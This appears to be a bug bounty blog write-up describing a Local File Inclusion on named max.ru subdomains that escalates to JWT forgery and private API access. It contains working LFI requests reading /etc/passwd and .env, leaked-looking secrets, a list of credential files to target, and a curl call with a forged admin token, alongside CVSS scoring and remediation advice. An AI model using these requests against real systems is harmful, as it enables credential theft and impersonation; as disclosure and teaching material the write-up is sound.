This is the story of how a seemingly simple Local File Inclusion (LFI) vulnerability escalated into a complete API and infrastructure compromise during a bug bounty engagement.
The vulnerability allowed me to retrieve sensitive configuration files from *.max.ru subdomains, extract credentials, forge authentication tokens, and ultimately access private APIs and source code repositories.
πΊ PoC Video: YouTube
π Evidence & Full Report: Yandex Disk
1οΈβ£ Reconnaissance & Initial Finding
During reconnaissance of the max.ru domain, I focused on parameters likely to handle file input. Two subdomains stood out:
business.max.ruhelp.max.ru
The file parameter behaved suspiciously. Testing with /etc/passwd returned actual system file contents β a classic LFI signature.
Example test:
GET https://business.max.ru/?file=/etc/passwd HTTP/1.1
Host: business.max.ru
User-Agent: Mozilla/5.0
Accept: */*
Response (truncated):
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
The lack of sanitization allowed arbitrary local file reading.
2οΈβ£ Targeting High-Value Files
Once confirmed, I prioritized files with the highest potential impact:
| File | Purpose | Potential Risk |
|---|---|---|
.env |
Environment variables | JWT secrets, DB creds, API keys |
config.php |
Application configuration | Database connection strings |
.git/config |
Git repo configuration | Repository URLs and tokens |
/var/www/html/config/database.php |
DB credentials | Full DB access |
/proc/self/environ |
Runtime env vars | Tokens in memory |
Example request for .env:
GET https://help.max.ru/?file=/.env HTTP/1.1
Host: help.max.ru
User-Agent: curl/7.68.0
Accept: */*
Example response:
APP_ENV=production
DB_HOST=db.max.ru
DB_USER=max_prod
DB_PASSWORD=Sup3rS3cretPass
JWT_SECRET=4a9c9b8f8d2a46f83d8e70f...
GIT_TOKEN=ghp_7d9f4a8321b...
3οΈβ£ Secrets Obtained
The extracted configuration files revealed multiple high-value secrets:
- JWT_SECRET β used to sign and validate authentication tokens
- DB_USER / DB_PASSWORD β full database credentials
- GitHub Personal Access Token β R/W access to private repositories
- Third-party API keys β payment gateways, analytics, and internal tools
4οΈβ£ Exploiting the JWT_SECRET
With the JWT_SECRET, I could:
- Forge my own valid JSON Web Tokens
- Replay existing leaked tokens
- Impersonate any user, including administrators
PoC request using forged token:
curl -H "Authorization: Bearer forged_admin_token" \
https://api.oneme.ru/api/user
Result:
Private API endpoints returned data without any password authentication.
5οΈβ£ Impact Analysis
The vulnerability chain enabled:
- Full API compromise β direct access to private endpoints
- Database breach β ability to dump, alter, or delete data
- Source code leak β private Git repos accessible with leaked tokens
- Lateral movement β potential pivot to other internal services
Risk mapping (MITRE ATT&CK):
- T1005 β Data from Local System
- T1552.001 β Unsecured Credentials: Environment Variables
- T1078 β Valid Accounts
- T1550.003 β Use of Web Tokens
6οΈβ£ CVSS Scoring
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Score: 9.0 (Critical)
Breakdown:
- AV:N β Network exploitable
- AC:L β Low attack complexity
- PR:N β No privileges required
- UI:N β No user interaction required
- S:C β Scope change (affects more than initial system)
- C:H / I:H / A:H β High impact on confidentiality, integrity, and availability
7οΈβ£ Recommendations
- Input Validation β Sanitize and whitelist file parameters.
- Access Controls β Restrict sensitive files from public access via server config.
- Secret Management β Remove production secrets from deployable code.
- Token Rotation β Immediately rotate JWT secrets and API keys after exposure.
- Logging & Monitoring β Detect suspicious file access patterns.
8οΈβ£ Key Takeaways for Bug Hunters
- Never underestimate an LFI β the real impact is in what it reveals.
-
.envandconfig.phpare gold mines for credentials. - JWT secrets are as sensitive as passwords β treat them accordingly.
- Git tokens can expose entire source codebases.
- Always think in terms of attack chains, not isolated bugs.
Keywords: LFI, Local File Inclusion, JWT Bypass, Token Replay, Auth Bypass, API Hack, Bug Bounty, Pentest, Web Security, CVSS 9.0, Security Research, Exploit
This case reinforces a core truth in offensive security:
A single weak link β if exploited fully β can unravel the entire security posture of an organization.
Top comments (0)